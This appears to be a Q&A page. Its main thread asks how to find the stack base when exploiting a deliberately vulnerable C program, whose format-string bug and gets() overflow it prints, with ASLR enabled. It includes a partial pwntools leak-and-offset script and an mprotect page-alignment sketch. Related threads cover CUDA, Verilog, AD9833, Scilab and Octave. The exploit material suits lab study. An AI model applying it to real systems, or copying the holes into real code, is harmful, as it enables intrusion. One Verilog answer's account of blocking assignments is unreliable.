How to calculate the start address of the stack of a PIE binary on a system with full ASLR enabled?

I have a PIE ELF binary with NX and PIE enabled, on a system with full ASLR enabled.
I have a problem finding the stack's base address. I want to ret2mprotect and then ret2shellcode on the stack,
but my exploit doesn't work because the offset I use to calculate the stack's base address changes on every run of the binary.
Could you please help me solve the problem?
Here is my vulnerable code:
#include <stdio.h>
int main(int argc, char* argv[]) {
    char buffer[256];
    printf(argv[1]);   /* format-string bug: argv[1] is used as the format */
    printf("\n");
    gets(buffer);      /* stack buffer overflow: no length check */
    return 0;
}
My compile command:
gcc -Wall -g -O0 -Wl,-rpath,./ -fcf-protection=none -fno-stack-protector -fpic vuln.c -o vuln
I get the required leaks from this format string (the value below is passed to the program):
%1$p:%41$p
The 1st leaked address is in the range of the stack.
The 41st leaked address is in the range of the libc library.
I used these sample values to determine the offsets (ex means example):
exStackStart = 0x7ffee8986000
exStackEnd = 0x7ffee89a8000
exLibcStart = 0x7fea59ec5000
exLibcEnd = 0x7fea5a03d000
exGetsBuffer = 0x7ffee89a5d50
exStackLeaked = 0x7ffee89a5f48
exLibcLeaked = 0x7fea59ec7083
offsetStackLeaked2StackEnd = exStackEnd - exStackLeaked
offsetStackLeaked2GetsBuffer = exStackLeaked - exGetsBuffer
offsetLibcLeaked2LibcStart = exLibcLeaked - exLibcStart
stackSize = exStackEnd - exStackStart
io = start()
output = io.recvuntil(b'\n').decode().split(':')
runStackLeaked = int(output[0], 16)
runLibcLeaked = int(output[1], 16)
runStackEnd = runStackLeaked + offsetStackLeaked2StackEnd
runStackStartRaw = runStackEnd - stackSize
runStackStart = runStackStartRaw & (~4095) <====== here is the problem! Sometimes this is correct and sometimes it is 0x1000 or 0x2000 away from the correct address
runGetsBuffer = runStackLeaked - offsetStackLeaked2GetsBuffer
runLibcStart = runLibcLeaked - offsetLibcLeaked2LibcStart
io.send(b'A' * 300 + b'\n')
io.interactive()
Update:
The vuln binary gives me an address that lies in the range of the stack (I've checked using the vmmap command in gdb) via the format-string vulnerability.
Full ASLR is enabled on my OS, so the stack address varies on each run of the binary. I would therefore like to find an offset that I can add to / subtract from the leaked address to reach the start of the stack (as shown by vmmap).
I measured the distance between the leaked address and the start of the stack and noted it down, so that I can automatically calculate the stack's start address just by adding/subtracting that offset to/from the leaked address, without checking manually in gdb.
Unfortunately, the offset differs on every run of the binary, so the recorded offset is not valid.
Offset from the leaked address to the stack's start address (obtained from vmmap in gdb); the following numbers are in decimal:
run1: 127480
run2: 128584
run3: 130632
run4: 126008
run5: 127656
As you can see, the distance between the leaked address and the start of the stack differs on each run.
What causes this, and how can I reliably calculate the stack's start address?
The following two pictures are from two runs of the program; the result is not what I expected.
result of run1
result of run2
I expected the offset from the start of the stack to any location in the stack to be fixed, but it varies on every run of my binary. As far as I know, ASLR only affects the base addresses of memory regions (stack, heap, ...), and offsets between locations within one memory region should be fixed.

The offset from the buffer to the start of the stack frame is indeed fixed. The offset from the buffer to the start of the stack mapping is not consistent: the data placed at the very top of the stack at exec time (program name, environment and argv strings, the auxiliary vector) plus a random amount of padding the kernel inserts there varies in size, so the distance from any stack frame to the mapping boundary shown by vmmap moves by a page or two between runs, even though the frames keep a fixed layout relative to each other. Your five measured offsets span 126008 to 130632 bytes, more than a page, which is exactly why rounding down to a page boundary is sometimes 0x1000 or 0x2000 off. For ret2mprotect you do not actually need the stack's start address: mprotect only needs a page-aligned address that covers your shellcode, so you can align the leaked buffer address down to a page boundary and change the protection of a page or two starting there.
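A minimal sketch of that idea, in the style of the question's pwntools script (start() and the offset constants are the ones from the question; the ROP stage itself is only hinted at in a comment, since the required gadgets depend on your libc):

PAGE = 0x1000

io = start()
leaks = io.recvline().decode().split(':')
runStackLeaked = int(leaks[0], 16)
runLibcLeaked = int(leaks[1], 16)

# These two offsets are stable across runs: same libc build, same stack frame.
runLibcStart = runLibcLeaked - offsetLibcLeaked2LibcStart
runGetsBuffer = runStackLeaked - offsetStackLeaked2GetsBuffer

# Do not try to recover the start of the stack mapping. mprotect() only
# needs a page-aligned address that covers the shellcode, so align the
# buffer address down and make two pages RWX in the ROP chain.
mprotectAddr = runGetsBuffer & ~(PAGE - 1)
mprotectLen = 2 * PAGE
# ... build a ROP chain that calls mprotect(mprotectAddr, mprotectLen, 7)
# and then returns into runGetsBuffer, where the shellcode lives.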

Related

(cudaBindTexture2D) How to bind a pitched-array from the middle

I am trying to bind a pitched array partly, from the middle (not from the beginning of the array), as follows.
/* 1. allocate */
cudaMallocPitch((void**)&d_texinput, &FloatPitch, cols*sizeof(float), rows);
cudaMallocPitch((void**)&d_output, &FloatPitch, cols*sizeof(float), rows);
/* 2. set row-length of target region (i.e., dividing rows 10 times) */
int row_div_times = 10;
int part_rows = rows / row_div_times;
int part_offset = part_rows*FloatPitch/sizeof(float);
dim3 threads(16,16);
dim3 Part_Blocks((cols + threads.x - 1) / threads.x, (part_rows + threads.y - 1) / threads.y);
/* 3. process divided rows, iteratively */
for (int i = 0; i < row_div_times; i++)
{
size_t offsetsize= i*part_offset;
/*computing values of "d_tex_input"*/
calibration<<<Part_Blocks, threads, 0, stream[i]>>>(d_texinput + i*part_offset);
/*
//###(QUESTION point!) I want to bind the device memory "d_texinput" to texture "tex_mem" only partly like below.
cudaBindTexture2D(0, tex_mem, &d_texinput[i*part_offset], channelDesc_flt, cols, part_rows, FloatPitch); //tentative code a;
... or something like ...
cudaBindTexture2D(&offsetsize, tex_mem, &d_texinput, channelDesc_flt, cols, part_rows, FloatPitch); //tentative code b;
*/
//final computaion with texture
final_computationwithtexture<<<Part_Blocks, threads, 0, stream[i]>>>(d_output + i*part_offset);
cudaUnbindTexture(tex_mem);
}
Could you please advise how to bind only the target region of the device memory array, by revising the code above at the QUESTION point?
I tried to understand the first argument of cudaBindTexture2D as an "offset", but according to the documentation it is not a value, it is a pointer.
I still could not understand the documentation.
I hope to understand what it is once I know the correct way to pass it to cudaBindTexture2D.
The offset parameter is not an input, it is an output. That's why it is a pointer. The function will set the offset in bytes. If you want to bind in the middle of an allocation, you set the devPtr argument (third) appropriately and then the function will give you the offset required for texture accesses.
Here is how to understand this: Textures can only be bound with a certain alignment. Memory allocations are always properly aligned. Therefore it is not an issue in most cases. However, if you provide an arbitrary memory address, CUDA has to round down to the alignment and you have to apply the proper offset later on.
Let's say you bind &float[66]; the proper alignment might be &float[64], so CUDA starts its texture at that address and you have to add an offset of 8 bytes to each access to get the desired result. I'm picking random numbers here, I don't know the alignment requirements.
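For illustration only, here is the rounding arithmetic described above sketched in plain Python (not CUDA API code); the 256-byte alignment is an assumption picked so that the float[66]/float[64] example works out:

def split_for_binding(addr, alignment=256):
    # Round an arbitrary byte address down to the assumed texture alignment
    # and report the leftover byte offset the caller must add to every
    # access (this mirrors what cudaBindTexture2D reports through its
    # first, output, parameter).
    base = addr & ~(alignment - 1)   # aligned address the texture is bound to
    offset = addr - base             # bytes to add on each access
    return base, offset

# binding at element 66 of a float array that starts at 0x10000:
base, offset = split_for_binding(0x10000 + 66 * 4)
print(hex(base), offset)   # 0x10100 (= &float[64]), offset 8 bytes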

Why are my Verilog output registers only outputting "x"?

I've written the following module to take in a 12-bit input stream and run it through the Exponential Moving Average (EMA) formula. When simulating it, my output appears to be a 12-bit stream of "don't cares". Regardless of what my input is, it is never reflected in the output register.
I'm a beginner at Verilog, so I'm sure there are a slew of issues here, but I expected to at least get some kind of output. Why is this behavior occurring and how can I fix it from occurring in the future? I've linked a screenshot of my waveform results at the bottom of this post.
My verilog module:
`timescale 1ns / 1ps
module EMATesting ( input signed [11:0] signal_in,
output reg signed [11:0] signal_out,
input clock_in,
input reset,
input enable,
output reg [11:0] newEMA);
reg [11:0] prevEMA;
reg [11:0] y;
reg [11:0] temp;
integer count = 0;
integer t = 1;
integer one = 1;
integer alpha = 0.5;
always @(posedge clock_in) begin
if (reset) begin
count = 0;
end
else if (count < 64) begin
count = count + 1;
end
//set the output equal to the first value received
if (count == 1) begin
newEMA = signal_in;
end
//if not the first value, run through the formula
else begin
temp = newEMA;
prevEMA = temp;
newEMA = alpha * signal_in + (one-alpha) * prevEMA;
count = count + 1;
end
end
endmodule
My verilog testbench:
`timescale 10ns / 1ns
module testbench_EMA;
reg signal_in;
reg clock_in, reset, enable;
wire [11:0] signal_out;
wire [11:0] newEMA;
initial begin
signal_in = 0; reset = 0; enable = 0;
clock_in = 0;
end
EMATesting DUT(signal_in, signal_out, clock_in, reset, enable, newEMA);
initial
begin
//test some values with timing intervals here
#100;
reset = 1;
#100;
reset = 0;
enable = 1;
#100;
//set signal_in to "1" repeating 12 times
signal_in = { 12 { 1'b1}};
#100;
reset = 1;
#100; //buffer to end simulation
$finish;
end
always
#5 clock_in = !clock_in;
endmodule
Waveform results of my testbench. Note that both output registers are giving no values.
There are many mistakes in your code. @Mr. Snrub listed some of them in the comments. You can correct the mistakes listed there, and by further editing your code you can make it work as you wish, but there are more important, fundamental problems. You have to solve them before you make further, hard-to-debug mistakes in the future; it also gives you the advantage of understanding HDL concepts better.
First of all, you need to understand the difference between software programming languages and hardware description languages. You should do further research on that; the mistakes you made are commonly made by developers who assume an HDL is similar to a software programming language. Check this link for further information.
You also need to understand how Verilog HDL (or any other HDL) code is synthesized and why it is used.
You need to be familiar with when and how to use blocking (=) and non-blocking (<=) assignments and how they work. Check this link.
When you research the listed topics, you will understand that in an edge-sensitive (synchronous/sequential) always block it is a bad idea to use blocking (=) assignments.
When you use blocking assignments, the assignments are executed in series, as in common software programming languages. In the case of an edge-sensitive always block, you have very limited time to finish all the required assignments inside the always block.
In your case, all the assignments inside the edge-sensitive always block are blocking, so (assuming no reset condition):
First, it checks whether count is less than 64 and completes that assignment if it is the case. All other assignments wait for that assignment to finish.
By the time the first assignment is done, the always block with posedge clock_in sensitivity might have ended execution and be waiting for the next edge of the clock, so the other assignments are not done.
As you have not initialized your output registers, they are initially filled with 'don't cares' and a new value is never assigned, so as a result you get that output (filled with 'don't cares').
Even when count becomes larger than or equal to 64, there are other blocking assignments before the one that assigns a value to newEMA.

AD9833 Frequency Control Using STM32F030F4P6

I'm using an STM32F030F4P6 and STM32Cube to drive an AD9833 signal generator.
I can generate signals, but I can't change the frequency. In the Analog Devices app note there is an example:
Given this example, I wrote code like this:
void AD9833_SetFRQ(float FRQ) {
uint32_t freq=0;
uint32_t freq0=0;
uint32_t freq1=0;
freq=(int)(((FRQ*pow(2,28))/FMCLK)+1); // Tuning Word
freq0=(freq&0x3fff)|(1<<14); // FREQ LSB
freq1=(freq>>14)|(1<<14); // FREQ MSB
AD9833_Reset();
HAL_GPIO_WritePin(GPIOB,GPIO_PIN_1,GPIO_PIN_RESET);
HAL_SPI_Transmit(&hspi1,(uint8_t*)&(freq0),1,10);
HAL_GPIO_WritePin(GPIOB,GPIO_PIN_1,GPIO_PIN_SET);
HAL_GPIO_WritePin(GPIOB,GPIO_PIN_1,GPIO_PIN_RESET);
HAL_SPI_Transmit(&hspi1,(uint8_t*)&(freq1),1,10);
HAL_GPIO_WritePin(GPIOB,GPIO_PIN_1,GPIO_PIN_SET);
HAL_GPIO_WritePin(GPIOB,GPIO_PIN_1,GPIO_PIN_RESET);
HAL_SPI_Transmit(&hspi1,(uint8_t*)&(A1),1,10);
HAL_GPIO_WritePin(GPIOB,GPIO_PIN_1,GPIO_PIN_SET);
AD9833_Set();
}
My data output is exactly like the Analog Devices example, as you can see in the logic analyzer image:
Still no luck changing the frequency. :(
What is the problem?
Did you ensure the control bits (e.g. DB13, and DB15/DB14 respectively) are written correctly?
Also, do you toggle reset at the end?
Check the "Command sequence explained" section of
https://www.analog.com/media/en/technical-documentation/application-notes/AN-1070.pdf
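A minimal sketch of the frequency-word arithmetic in Python, just to make the bit layout explicit (this assumes FMCLK = 25 MHz and the FREQ0 register; the question's (1<<14) corresponds to the D15:D14 = 01 register-address bits, and DB13 is the B28 bit mentioned above):

FMCLK = 25_000_000  # assumed master clock

def freq0_words(f_out_hz):
    # 28-bit tuning word: f_out * 2^28 / FMCLK
    tuning = int(round(f_out_hz * (1 << 28) / FMCLK))
    lsb = (tuning & 0x3FFF) | 0x4000          # D15:D14 = 01 -> FREQ0, low 14 bits
    msb = ((tuning >> 14) & 0x3FFF) | 0x4000  # D15:D14 = 01 -> FREQ0, high 14 bits
    return lsb, msb

control = 0x2100   # B28 = 1 (two consecutive 14-bit writes) and RESET = 1
lsb, msb = freq0_words(1000)   # e.g. 1 kHz output
print(hex(control), hex(lsb), hex(msb))
# After writing control, lsb, msb (and a phase word), clear RESET (write 0x2000)
# so the output actually starts at the new frequency.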

How to solve a second order differential equation on Scilab?

I need to solve this differential equation using Runge-Kutta 4(5) in Scilab:
The initial conditions are given above. The interval and the step size h are:
I don't need to implement Runge-Kutta. I just need to solve this and plot the result on the plane:
I tried to follow these instructions on the official "Scilab Help":
https://x-engineer.org/graduate-engineering/programming-languages/scilab/solve-second-order-ordinary-differential-equation-ode-scilab/
The suggested code is:
// Import the diagram and set the ending time
loadScicos();
loadXcosLibs();
importXcosDiagram("SCI/modules/xcos/examples/solvers/ODE_Example.zcos");
scs_m.props.tf = 5000;
// Select the solver Runge-Kutta and set the precision
scs_m.props.tol(6) = 6;
scs_m.props.tol(7) = 10^-2;
// Start the timer, launch the simulation and display time
tic();
try xcos_simulate(scs_m, 4); catch disp(lasterror()); end
t = toc();
disp(t, "Time for Runge-Kutta:");
However, it is not clear to me how to adapt this to the specific differential equation I showed above. I have only a very basic knowledge of Scilab.
The final plot should be something like the picture below, an ellipse:
Just to provide some mathematical context, this is the differential equation that describes the pendulum problem.
Could someone help me, please?
=========
UPDATE
Based on @luizpauloml's comments, I am updating this post.
I need to convert the second-order ODE into a system of first-order ODEs, and then I need to write a function to represent such a system.
I know how to do this with pen and paper. Hence, using z as a variable:
OK, but how do I write a normal script?
The Xcos part is quite disposable. I only kept it because I was trying to mimic the example on the official Scilab page.
To solve this, you need to use ode(), which can employ many methods, Runge-Kutta included. First, you need to define a function to represent the system of ODEs, and Step 1 in the link you provided shows you what to do:
function z = f(t,y)
//f(t,y) represents the system of ODEs:
// -the first argument should always be the independent variable
// -the second argument should always be the dependent variables
// -it may have more than two arguments
// -y is a vector 2x1: y(1) = theta, y(2) = theta'
// -z is a vector 2x1: z(1) = z , z(2) = z'
z(1) = y(2) //first equation: z = theta'
z(2) = 10*sin(y(1)) //second equation: z' = 10*sin(theta)
endfunction
Notice that even if t (the independent variable) does not explicitly appear in your system of ODEs, it still needs to be an argument of f(). Now you just use ode(), setting the flag 'rk' or 'rkf' to use either one of the available Runge-Kutta methods:
ts = linspace(0,3,200);
theta0 = %pi/4;
dtheta0 = 0;
y0 = [theta0; dtheta0];
t0 = 0;
thetas = ode('rk', y0, t0, ts, f); //the output has the same order
//as the argument `y` of f()
scf(1); clf();
plot2d(thetas(2,:),thetas(1,:),-5);
xtitle('Phase portrait', 'theta''(t)','theta(t)');
xgrid();
The output is the expected elliptical phase portrait (see the plot referenced in the question).
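For comparison, here is a minimal sketch of the same computation in Python with SciPy's solve_ivp (an explicit Runge-Kutta 4(5) method); the right-hand side theta'' = 10*sin(theta) and the initial conditions are taken from the Scilab code above, everything else is an assumption:

import numpy as np
from scipy.integrate import solve_ivp
import matplotlib.pyplot as plt

def f(t, y):
    # y[0] = theta, y[1] = theta'; same system as the Scilab f() above
    return [y[1], 10*np.sin(y[0])]

ts = np.linspace(0, 3, 200)
sol = solve_ivp(f, (0, 3), [np.pi/4, 0], method='RK45', t_eval=ts)

plt.plot(sol.y[1], sol.y[0])   # phase portrait: theta'(t) on x, theta(t) on y
plt.xlabel("theta'(t)")
plt.ylabel("theta(t)")
plt.title("Phase portrait")
plt.grid(True)
plt.show()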

Composite trapezoid rule not running in Octave

I have the following code in Octave implementing the composite trapezoid rule, and for some reason the function just stalls whenever I run it in Octave on f = @(x) x^2, a = 0, b = 4, TOL = 10^-6. Whenever I call trapezoid(f, a, b, TOL), nothing happens and I have to exit the terminal in order to do anything else in Octave. Here is the code:
% INPUTS
%
% f : a function
% a : starting point
% b : endpoint
% TOL : tolerance
function root = trapezoid(f, a, b, TOL)
disp('test');
max_iterations = 10000;
disp(max_iterations);
count = 1;
disp(count);
initial = (b-a)*(f(b) + f(a))/2;
while count < max_iterations
disp(initial);
trap_0 = initial;
trap_1 = 0;
trap_1_midpoints = a:(0.5^count):b;
for i = 1:(length(trap_1_midpoints)-1)
trap_1 = trap_1 + (trap_1_midpoints(i+1) - trap_1_midpoints(i))*(f(trap_1_midpoints(i+1) + f(trap_1_midpoints(i))))/2;
endfor
if abs(trap_0 - trap_1) < TOL
root = trap_1;
return;
endif
intial = trap_1;
count = count + 1;
disp(count);
endwhile
disp(['Process ended after ' num2str(max_iterations), ' iterations.']);
I have tried your function in Matlab.
Your code is not stalling. Rather, the size of trap_1_midpoints increases exponentially, and with it the computation time of trap_1 also increases exponentially. This is what you experience as stalling.
I also found a possible bug in your code. I guess the line after the if clause should be initial = trap_1. Check the missing 'i'.
With that, your code still takes forever, but if you increase the tolerance (e.g. to a value of 1) your code returns.
You could try to vectorize the for loop to speed it up.
Edit: I think that inside your for loop, a ) is missing after f(trap_1_midpoints(i+1).
After count=52 or so, the arithmetic sequence trap_1_midpoints is no longer representable in any meaningful fashion in floating point numbers. After count=1075 or similar, the step size is no longer representable as a positive floating point double number. That all is to say, the bound max_iterations = 10000 is ludicrous. As explained below, all computations after count=20 are meaningless.
The theoretical error for step size h is O(T·h^2). There is also numerical error accumulation in the summation of O(T/h) numbers, which is of size O(mu/h) with mu = 1 ulp = 2^(-52). In total this means that the lowest error of the numerical integration can be expected around h = mu^(1/3), for double precision thus h ≈ 1e-5, or count = 17 in the algorithm. This may vary with the interval length and with how smooth or wavy the function is.
One can expect the error to be divided by four when halving the step size only for step sizes above this boundary of 1e-5. This also means that abs(trap_0 - trap_1) is a reliable measure for the error of trap_0 (and abs(trap_0 - trap_1)/3 for trap_1) only inside this range of step sizes.
The error bound TOL=1e-6 should be met for about h=1e-3, which corresponds to count=10. If the recursion does not stop for count = 14 (which should give an error smaller than 1e-8) then the method is not accurately implemented.
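A small Python sketch of these estimates, using the same integrand f(x) = x^2 on [0, 4] from the question (exact integral 64/3) and the same step sizes h = 0.5^count; this is only an illustration, not the Octave code:

import numpy as np

f = lambda x: x**2
a, b = 0.0, 4.0
exact = 64.0 / 3.0   # integral of x^2 over [0, 4]

for count in (5, 8, 10, 14):
    h = 0.5**count
    x = np.arange(a, b + h/2, h)   # composite trapezoid nodes a, a+h, ..., b
    y = f(x)
    approx = h * (y[0]/2 + y[1:-1].sum() + y[-1]/2)
    print(f"count={count:2d}  h={h:.1e}  error={abs(approx - exact):.2e}")

# The error shrinks by roughly a factor of 4 per halving of h and drops
# below TOL = 1e-6 around count = 10, matching the estimate above.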